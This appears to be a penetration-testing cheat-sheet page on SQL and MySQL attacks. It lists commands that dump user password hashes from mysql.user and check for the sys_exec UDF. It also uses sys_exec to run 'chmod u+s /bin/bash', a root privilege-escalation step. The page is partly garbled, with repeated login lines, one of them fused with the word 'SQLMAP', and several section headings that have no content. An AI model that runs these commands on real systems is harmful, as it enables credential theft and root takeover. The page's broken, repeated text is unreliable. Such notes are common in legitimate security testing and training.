SQL Injection
SQL stuff
Basic SQL Commands
#basic SQL commands
mysql -u userName -p
show databases;
user databaseName;
show tables;
describe mysql.user;
select * from mysql.user;
select host,user,password from mysql.user;
#Check for UDF for code injection
select * from mysql.func;
#+-----------------------+-----+---------------------+----------+
#| name | ret | dl | type |
#+-----------------------+-----+---------------------+----------+
#| lib_mysqludf_sys_info | 0 | lib_mysqludf_sys.so | function |
#| sys_exec | 0 | lib_mysqludf_sys.so | function |
#+-----------------------+-----+---------------------+----------+
select sys_exec('chmod u+s /bin/bash');
select sys_exec('chmod u+s /bin/bash');
#basic SQL commands
mysql -u userName -p
#basic SQL commands
mysql -u userName -p
#basic SQL commands
mysql -u userName -pSQLMAP
Current Schema
Show Tables
Column Names
User defined Tables/Columns
Bypass Auth
Enum num of Columns
MySQL samples
Last updated
Was this helpful?